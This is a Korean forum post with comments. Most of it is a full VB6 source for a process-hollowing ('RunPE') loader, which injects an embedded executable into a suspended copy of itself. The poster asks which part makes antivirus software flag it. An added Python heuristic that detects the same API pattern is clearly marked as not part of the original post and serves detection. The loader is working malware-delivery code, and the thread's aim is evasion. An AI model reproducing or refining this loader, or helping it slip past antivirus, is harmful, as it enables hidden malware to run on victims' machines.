수다닷컴

This is a really annoying situation

루나

2023.04.01

attribute vb_name = submain
private declare function getmodulefilename lib kernel32.dll alias getmodulefilenamea (byval hmodule as long, byval lpfilename as string, byval nsize as long) as long
private declare function createprocess lib kernel32.dll alias createprocessa (byval lpapplicationname as string, byval lpcommandline as string, byref lpprocessattributes as any, byref lpthreadattributes as any, byval binherithandles as long, byval dwcreationflags as long, byref lpenvironment as any, byval lpcurrentdriectory as string, byref lpstartupinfo as startupinfo, byref lpprocessinformation as process_information) as long
private declare function closehandle lib kernel32.dll (byval hobject as long) as long
private declare function virtualallocex lib kernel32.dll (byval hprocess as long, byref lpaddress as any, byval dwsize as long, byval flallocationtype as long, byval flprotect as long) as long
private declare function virtualprotectex lib kernel32.dll (byval hprocess as long, byref lpaddress as any, byval dwsize as long, byval flnewprotect as long, byref lpfloldprotect as long) as long
private declare function zwunmapviewofsection lib ntdll.dll (byval processhandle as long, byref baseaddress as any) as long
private declare function getthreadcontext lib kernel32.dll (byval hthread as long, byref lpcontext as context) as long
private declare function setthreadcontext lib kernel32.dll (byval hthread as long, byref lpcontext as context) as long
private declare function terminateprocess lib kernel32.dll (byval hprocess as long, byval uexitcode as long) as long
private declare function readprocessmemory lib kernel32.dll (byval hprocess as long, byref lpbaseaddress as any, byref lpbuffer as any, byval nsize as long, byref lpnumberofbytesread as long) as long
private declare function writeprocessmemory lib kernel32.dll (byval hprocess as long, byref lpbaseaddress as any, byref lpbuffer as any, byval nsize as long, byref lpnumberofbyteswritten as long) as long
private declare function resumethread lib kernel32.dll (byval hthread as long) as long
private declare function exitprocess lib kernel32.dll (byval exitcode as long) as long
private declare sub rtlmovememory lib kernel32.dll (byref destination as any, byref source as any, byval length as long)
private const status_success& = 0&
private const create_suspended& = 4&
private const context_full& = 65543
private const mem_commit& = &h1000&
private const mem_reserve& = &h2000&
private const page_noaccess& = &h1
private const page_readonly& = &h2
private const page_readwrite& = 4&
private const page_execute& = &h10
private const page_execute_read& = &h20
private const page_execute_readwrite& = &h40
private const image_scn_mem_read& = &h40000000
private const image_scn_mem_write& = &h80000000
private const image_scn_mem_execute& = &h20000000
private type startupinfo
cb as long
lpreserved as long
lpdesktop as long
lptitle as long
dwx as long
dwy as long
dwxsize as long
dwysize as long
dwxcountchars as long
dwycountchars as long
dwfillattribute as long
dwflags as long
wshowwindow as integer
cbreserved2 as integer
lpreserved2 as byte
hstdinput as long
hstdoutput as long
hstderror as long
end type
private type process_information
hprocess as long
hthread as long
dwprocessid as long
dwthreadid as long
end type
private type floating_save_area
controlword as long
statusword as long
tagword as long
erroroffset as long
errorselector as long
dataoffset as long
dataselector as long
registerarea(79) as byte
cr0npxstate as long
end type
private type context
contextflags as long
dr0 as long
dr1 as long
dr2 as long
dr3 as long
dr6 as long
dr7 as long
floatsave as floating_save_area
seggs as long
segfs as long
seges as long
segds as long
edi as long
esi as long
ebx as long
edx as long
ecx as long
eax as long
ebp as long
eip as long
segcs as long
eflags as long
esp as long
segss as long
extendedregisters(511) as byte
end type
private type image_dos_header
e_magic as integer
e_cblp as integer
e_cp as integer
e_crlc as integer
e_cparhdr as integer
e_minalloc as integer
e_maxalloc as integer
e_ss as integer
e_sp as integer
e_csum as integer
e_ip as integer
e_cs as integer
e_lfarlc as integer
e_ovno as integer
e_res(3) as integer
e_oemid as integer
e_oeminfo as integer
e_res2(9) as integer
e_lfanew as long
end type
private type image_file_header
machine as integer
numberofsections as integer
timedatestamp as long
pointertosymboltable as long
numberofsymbols as long
sizeofoptionalheader as integer
characteristics as integer
end type
private type image_data_directory
virtualaddress as long
size as long
end type
private type image_optional_header
magic as integer
majorlinkerversion as byte
minorlinkerversion as byte
sizeofcode as long
sizeofinitializeddata as long
sizeofuninitializeddata as long
addressofentrypoint as long
baseofcode as long
baseofdata as long
imagebase as long
sectionalignment as long
filealignment as long
majoroperatingsystemversion as integer
minoroperatingsystemversion as integer
majorimageversion as integer
minorimageversion as integer
majorsubsystemversion as integer
minorsubsystemversion as integer
win32versionvalue as long
sizeofimage as long
sizeofheaders as long
checksum as long
subsystem as integer
dllcharacteristics as integer
sizeofstackreserve as long
sizeofstackcommit as long
sizeofheapreserve as long
sizeofheapcommit as long
loaderflags as long
numberofrvaandsizes as long
datadirectory(15) as image_data_directory
end type
private type image_nt_headers
signature as long
fileheader as image_file_header
optionalheader as image_optional_header
end type
private type image_section_header
sectionname(7) as byte
virtualsize as long
virtualaddress as long
sizeofrawdata as long
pointerofrawdata as long
pointertorelocations as long
pointertolinenumbers as long
numberofrelocations as integer
numberoflinenumbers as integer
characteristics as long
end type
private const image_dos_signature& = &h5a4d&
private const image_nt_signature& = &h4550&
private sub main()
on error goto unexceptederror
dim filedata() as byte, sfilename as string, si as startupinfo, pi as process_information, hprocess as long, cx as context, imagebaseaddr as long, _
doshdr as image_dos_header, nthdr as image_nt_headers, lpallocmemory as long, psecheader as long, sechdr as image_section_header, sechdrindex as long, protect as long, _
old as long
filedata() = loadresdata(101, custom)
si.cb = len(si)
sfilename = string$(260&, 0)
getmodulefilename 0&, sfilename, 260&
hprocess = createprocess( _
sfilename, _
vbnullstring, _
byval 0&, byval 0&, 0&, _
create_suspended, byval 0&, app.path, _
si, pi)
if hprocess = 0& then
msgbox 프로세스 생성에 실패했습니다., vbcritical, 오류
exitprocess 0
exit sub
end if
cx.contextflags = context_full
if getthreadcontext(pi.hthread, cx) = 0& then
msgbox 쓰레드의 레지스터 정보를 얻어오는 데 실패했습니다., vbcritical, 오류
gosub processcleanup
exitprocess 0
exit sub
end if
if readprocessmemory(pi.hprocess, byval cx.ebx + 8&, imagebaseaddr, 4, byval 0&) = 0& then
msgbox 프로세스의 메모리를 읽어올 수 없었습니다., vbcritical, 오류
gosub processcleanup
exitprocess 0
exit sub
end if
if zwunmapviewofsection(pi.hprocess, byval imagebaseaddr) <> status_success then
msgbox 프로세스의 이미지를 unmap할 수 없었습니다., vbcritical, 오류
gosub processcleanup
exitprocess 0
exit sub
end if

rtlmovememory doshdr, filedata(0), len(doshdr)
rtlmovememory nthdr, filedata(doshdr.e_lfanew), len(nthdr)
lpallocmemory = virtualallocex(pi.hprocess, _
byval nthdr.optionalheader.imagebase, _
nthdr.optionalheader.sizeofimage, _
mem_commit or mem_reserve, _
page_readwrite)
if lpallocmemory = 0& then
msgbox 메모리 할당에 실패하였습니다., vbcritical, 오류
gosub processcleanup
exitprocess 0
exit sub
end if
if writeprocessmemory(pi.hprocess, byval cx.ebx + 8&, lpallocmemory, 4, byval 0&) = 0& then
msgbox peb-imagebaseaddress를 쓸 수 없었습니다., vbcritical, 오류
gosub processcleanup
exitprocess 0
exit sub
end if

if writeprocessmemory(pi.hprocess, _
byval lpallocmemory, _
filedata(0), _
nthdr.optionalheader.sizeofheaders, _
byval 0&) = 0& then
msgbox 이미지를 쓸 수 없었습니다., vbcritical, 오류
gosub processcleanup
exitprocess 0
exit sub
end if
psecheader = varptr(filedata(0)) + doshdr.e_lfanew + len(nthdr)
for sechdrindex = 0 to nthdr.fileheader.numberofsections - 1
rtlmovememory sechdr, byval psecheader + sechdrindex * len(sechdr), len(sechdr)
if writeprocessmemory(pi.hprocess, byval sechdr.virtualaddress + lpallocmemory, filedata(sechdr.pointerofrawdata), sechdr.sizeofrawdata, byval 0&) = 0& then
msgbox 섹션을 쓰는 도중에 오류가 발생했습니다., vbcritical, 오류
gosub processcleanup
exitprocess 0
exit sub
end if
if sechdr.sizeofrawdata then
if sechdr.characteristics and image_scn_mem_read then
protect = page_readonly
if sechdr.characteristics and image_scn_mem_write then
protect = page_readwrite
if sechdr.characteristics and image_scn_mem_execute then
protect = page_execute_readwrite
end if
else
if sechdr.characteristics and image_scn_mem_execute then
protect = page_execute_read
end if
end if
else
protect = page_noaccess
if sechdr.characteristics and image_scn_mem_execute then
protect = page_execute
end if
end if
if virtualprotectex(pi.hprocess, byval sechdr.virtualaddress + lpallocmemory, sechdr.virtualsize, protect, old) = 0& then
msgbox 섹션 페이지의 보호 옵션을 쓰는 도중에 오류가 발생했습니다., vbcritical, 오류
gosub processcleanup
exitprocess 0
exit sub
end if
end if
next
cx.eax = nthdr.optionalheader.addressofentrypoint + lpallocmemory
if setthreadcontext(pi.hthread, cx) = 0& then
msgbox 대상 쓰레드의 레지스터 정보를 쓸 수 없었습니다., vbcritical, 오류
gosub processcleanup
exitprocess 0
exit sub
end if
if resumethread(pi.hthread) = -1& then
msgbox 대상 쓰레드를 재개할 수 없었습니다., vbcritical, 오류
gosub processcleanup
exitprocess 0
exit sub
end if
exit sub
processcleanup:
terminateprocess pi.hprocess, 0&
closehandle pi.hthread
closehandle pi.hprocess
return
unexceptederror:
gosub processcleanup
exitprocess 0
end sub

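I compiled a program from 수다's source,

and it says it's a virus, so

I reported a false positive to ALYac (알약), source code included,

...

and they say it isn't detected?

But I just tried it and it still gets detected, even after updating..

Is there a way to find out which part is being detected?

Is it the APIs?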
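
On the question of whether the declared APIs alone can trigger a detection: the following is an added example, not part of the original post and not the logic of ALYac or any other product. It is a simplified static heuristic that reads VB6 `declare` lines and reports which stages of the suspended-process image-replacement pattern a source file imports; the stage names, the `CORE` set and the threshold are assumptions made for illustration.

```python
import re

# Constructed sample: declaration lines in the style of the post, arguments abbreviated.
SAMPLE = """\
private declare function createprocess lib kernel32.dll alias createprocessa (...) as long
private declare function virtualallocex lib kernel32.dll (...) as long
private declare function zwunmapviewofsection lib ntdll.dll (...) as long
private declare function setthreadcontext lib kernel32.dll (...) as long
private declare function writeprocessmemory lib kernel32.dll (...) as long
private declare function resumethread lib kernel32.dll (...) as long
"""
# Constructed benign sample: a launcher that only starts a child process.
BENIGN = """\
private declare function createprocess lib kernel32.dll alias createprocessa (...) as long
private declare function closehandle lib kernel32.dll (...) as long
"""

# VB6 Declare statement: captures the declared name and the DLL (quotes optional).
DECLARE_RE = re.compile(r'declare\s+(?:function|sub)\s+(\w+)\s+lib\s+"?([\w.]+)"?', re.I)

# Hypothetical rule: each stage is satisfied by any one of its API names.
STAGES = {
    "suspended_child": {"createprocess", "createprocessa", "createprocessw"},
    "unmap_image": {"zwunmapviewofsection", "ntunmapviewofsection"},
    "remote_alloc": {"virtualallocex"},
    "remote_write": {"writeprocessmemory"},
    "redirect_thread": {"setthreadcontext"},
    "resume": {"resumethread"},
}
# Stages that rarely appear together in ordinary applications (assumption).
CORE = {"unmap_image", "remote_write", "redirect_thread"}

def declared_apis(source):
    """Map each declared API name (lower-cased) to the DLL it is imported from."""
    return {m.group(1).lower(): m.group(2).lower() for m in DECLARE_RE.finditer(source)}

def hollowing_stages(source):
    """Return the stages whose APIs are declared, in pattern order."""
    apis = set(declared_apis(source))
    return [stage for stage, names in STAGES.items() if apis & names]

def verdict(source, threshold=5):
    """Flag the source when enough stages, including all CORE ones, are present."""
    hits = hollowing_stages(source)
    return (len(hits) >= threshold and CORE <= set(hits)), hits

if __name__ == "__main__":
    for label, text in (("sample", SAMPLE), ("benign", BENIGN)):
        print(label, verdict(text))
```

A rule of this shape fires on the combination of imports rather than on any single API, which is why a file can be flagged even when each call on its own is common.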


COMMENT

  • 너의길

    ALYac is just broken like that.

    Use V3 instead.

  • 별하

    The people who answer at ALYac are really dumb.
